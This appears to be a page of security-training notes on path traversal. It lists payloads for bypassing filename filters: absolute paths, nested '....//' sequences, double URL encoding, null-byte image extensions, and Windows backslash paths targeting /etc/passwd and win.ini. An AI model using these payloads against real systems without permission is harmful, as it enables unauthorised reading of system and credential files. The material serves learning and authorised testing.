Path Traversal
Application blocks traversal sequences but treats the supplied filename as being relative to a absolute path and can be exploit with
/etc/passwd
absolute path to target file payload.Images on target is loaded using
filename
parameter, and is defending against traversal attacks by stripping path traversal. Exploit using....//....//....//....//etc/passwd
payloads.Superfluous URL-encoded
..%252f..%252f..%252fetc/passwd
payload can bypass application security controls.Leading the beginning of the filename referenced with the original path and then appending
/var/www/images/../../../etc/passwd
payload at end bypasses the protection.Using a null byte character at end plus an image extension to fool APP controls that an image is requested, this
../../../etc/passwd%00.png
payload succeed.Double URL encode file path traversal, as example this
../../../../../../../../../../etc/hostname
will be URL double encoded as,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname
.Windows OS accept both
../
and..\
for directory traversal syntax, and as example retrievingloadImage?filename=..\..\..\windows\win.ini
on windows target to identify valid path traversal.
Intruder payloads list:
Headers to bypass access to files
Last updated